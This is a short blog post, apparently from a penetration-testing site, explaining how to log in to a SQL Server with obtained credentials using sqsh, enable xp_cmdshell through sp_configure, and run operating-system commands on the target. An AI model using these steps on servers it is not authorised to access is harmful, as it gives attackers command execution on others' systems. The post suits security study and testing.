Enabling XP_CMDSHELL in SQL Server

Posted on September 6, 2020 by Harley in Tips & Tricks

If you ever get access to SQL credentials, you may be able to use a tool to connect to it via commandline and execute system commands via “XP_CMDSHELL”. However, this feature is not always enabled by default.

We’ll start by connecting to our target w/ the following command.

sqsh -S <ipAddress> -U <user> -P <password>

And then we’ll run the following commands to enable XP_CMDSHELL.

EXEC SP_CONFIGURE 'show advanced options', 1
reconfigure go

EXEC SP_CONFIGURE 'xp_cmdshell', 1 reconfigure go

At this point, we should be able to execute our commands.

xp_cmdshell '<command>'

Leave a Reply Cancel reply

Enter your comment here...

Fill in your details below or click an icon to log in:

Email (required) (Address never made public)

Name (required)

Website

You are commenting using your WordPress.com account. ( Log Out / Change )

You are commenting using your Twitter account. ( Log Out / Change )

You are commenting using your Facebook account. ( Log Out / Change )

Cancel

Connecting to %s

%d bloggers like this:

Infinite Logins

Infinite Logins

Enabling XP_CMDSHELL in SQL Server

Leave a Reply Cancel reply

Infinite Logins

Share this:

Like this:

Related

Leave a Reply Cancel reply